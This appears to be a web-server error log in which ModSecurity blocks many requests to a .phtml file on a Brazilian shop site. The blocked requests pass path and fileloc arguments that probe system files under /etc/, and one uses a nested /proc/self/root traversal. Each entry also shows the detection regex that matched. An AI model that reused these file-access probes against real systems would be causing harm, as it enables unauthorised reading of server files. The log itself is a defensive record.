[Thu Mar 19 14:37:54.906591 2026] [:error] [pid 14269:tid 140411590858496] [client 57.141.18.119:46166] [client 57.141.18.119] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0cgbLMZ6AikZjR9V5oAAAABI"]
[Thu Mar 19 14:37:55.303873 2026] [:error] [pid 14269:tid 140411741927168] [client 57.141.18.4:46174] [client 57.141.18.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/wgetrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0cwbLMZ6AikZjR9V5oQAAAAA"]
[Thu Mar 19 14:37:55.786986 2026] [:error] [pid 14269:tid 140411540502272] [client 57.141.18.44:46186] [client 57.141.18.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/polkit-1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0cwbLMZ6AikZjR9V5ogAAABg"]
[Thu Mar 19 14:37:56.161958 2026] [:error] [pid 14269:tid 140411616036608] [client 57.141.18.114:46200] [client 57.141.18.114] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0dAbLMZ6AikZjR9V5pQAAAA8"]
[Thu Mar 19 14:37:56.609376 2026] [:error] [pid 14269:tid 140411666392832] [client 57.141.18.43:46210] [client 57.141.18.43] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sysctl.conf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0dAbLMZ6AikZjR9V5pgAAAAk"]
[Thu Mar 19 14:37:56.625274 2026] [:error] [pid 14269:tid 140411708356352] [client 57.141.18.54:46214] [client 57.141.18.54] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/.pwd.lock"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0dAbLMZ6AikZjR9V5pwAAAAQ"]
[Thu Mar 19 14:37:56.952500 2026] [:error] [pid 14269:tid 140411691570944] [client 57.141.18.66:46220] [client 57.141.18.66] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0dAbLMZ6AikZjR9V5qAAAAAY"]
[Thu Mar 19 14:37:57.194781 2026] [:error] [pid 14269:tid 140411599251200] [client 57.141.18.4:46226] [client 57.141.18.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/protocols"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0dQbLMZ6AikZjR9V5qQAAABE"]
[Thu Mar 19 14:37:57.611660 2026] [:error] [pid 14269:tid 140411557287680] [client 57.141.18.25:46236] [client 57.141.18.25] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/anacrontab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0dQbLMZ6AikZjR9V5qgAAABY"]
[Thu Mar 19 14:37:58.278759 2026] [:error] [pid 7893:tid 140411632822016] [client 57.141.18.30:45938] [client 57.141.18.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ntp.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0dhCii7xarUs8iHYFjQAAAg0"]
[Thu Mar 19 14:37:58.574879 2026] [:error] [pid 15826:tid 140411557287680] [client 57.141.18.121:46258] [client 57.141.18.121] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0duoXxyEfFpUF8f8ovgAAAVY"]
[Thu Mar 19 14:37:58.910620 2026] [:error] [pid 27293:tid 140411741927168] [client 57.141.18.92:46262] [client 57.141.18.92] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0dv-YZRR_7pZ7nDKnjQAAA8A"]
[Thu Mar 19 14:37:59.232849 2026] [:error] [pid 27293:tid 140411624429312] [client 57.141.18.92:46276] [client 57.141.18.92] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0d_-YZRR_7pZ7nDKnjgAAA84"]
[Thu Mar 19 14:37:59.292824 2026] [:error] [pid 14269:tid 140411582465792] [client 57.141.18.7:46278] [client 57.141.18.7] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0dwbLMZ6AikZjR9V5rQAAABM"]
[Thu Mar 19 14:37:59.877524 2026] [:error] [pid 7235:tid 140411683178240] [client 57.141.18.84:46294] [client 57.141.18.84] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0d_qxLDW4GITHUkSEzwAAAQc"]
[Thu Mar 19 14:38:00.120150 2026] [:error] [pid 17653:tid 140411548894976] [client 57.141.18.21:46300] [client 57.141.18.21] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0eMdf6f5d65gmYZSWngAAAtc"]
[Thu Mar 19 14:38:00.250317 2026] [:error] [pid 14269:tid 140411699963648] [client 74.7.243.128:49380] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw0eAbLMZ6AikZjR9V5rgAAAAU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 14:38:00.451277 2026] [:error] [pid 7235:tid 140411741927168] [client 57.141.18.7:46306] [client 57.141.18.7] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0ePqxLDW4GITHUkSE0AAAAQA"]
[Thu Mar 19 14:38:00.469233 2026] [:error] [pid 7235:tid 140411708356352] [client 57.141.18.45:46308] [client 57.141.18.45] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/nsswitch.conf.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0ePqxLDW4GITHUkSE0QAAAQQ"]
[Thu Mar 19 14:38:00.714126 2026] [:error] [pid 17887:tid 140411548894976] [client 74.7.244.43:42110] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abw0eAkwaGbbGflqUZDlxgAAANc"]
[Thu Mar 19 14:38:01.103931 2026] [:error] [pid 8307:tid 140411632822016] [client 57.141.18.110:46322] [client 57.141.18.110] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/logrotate.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0eb-FhjpZGs9ba8qHAQAAAw0"]
[Thu Mar 19 14:38:01.129777 2026] [proxy_fcgi:error] [pid 15826:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:42620] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 14:38:01.624445 2026] [:error] [pid 27293:tid 140411582465792] [client 57.141.18.1:46340] [client 57.141.18.1] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mime.types"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0ef-YZRR_7pZ7nDKnkAAAA9M"]
[Thu Mar 19 14:38:01.755760 2026] [:error] [pid 30077:tid 140411741927168] [client 57.141.18.12:46344] [client 57.141.18.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/profile"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0efu8EFLIOrSqIpvE0wAAAkA"]
[Thu Mar 19 14:38:02.266906 2026] [:error] [pid 17887:tid 140411557287680] [client 57.141.18.29:46350] [client 57.141.18.29] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subgid"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0egkwaGbbGflqUZDlxwAAANY"]
[Thu Mar 19 14:38:02.684641 2026] [:error] [pid 27293:tid 140411716749056] [client 57.141.18.43:46358] [client 57.141.18.43] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0ev-YZRR_7pZ7nDKnkwAAA8M"]
[Thu Mar 19 14:38:02.755301 2026] [:error] [pid 27293:tid 140411683178240] [client 57.141.18.103:46364] [client 57.141.18.103] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/aliases.db"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0ev-YZRR_7pZ7nDKnlAAAA8c"]
[Thu Mar 19 14:38:03.131605 2026] [:error] [pid 17887:tid 140411683178240] [client 57.141.18.60:46374] [client 57.141.18.60] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/yum.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0ewkwaGbbGflqUZDlyQAAAMc"]
[Thu Mar 19 14:38:03.429505 2026] [:error] [pid 15826:tid 140411582465792] [client 57.141.18.97:46380] [client 57.141.18.97] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/yum.conf.bkp-21-10-22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abw0e-oXxyEfFpUF8f8ovwAAAVM"]
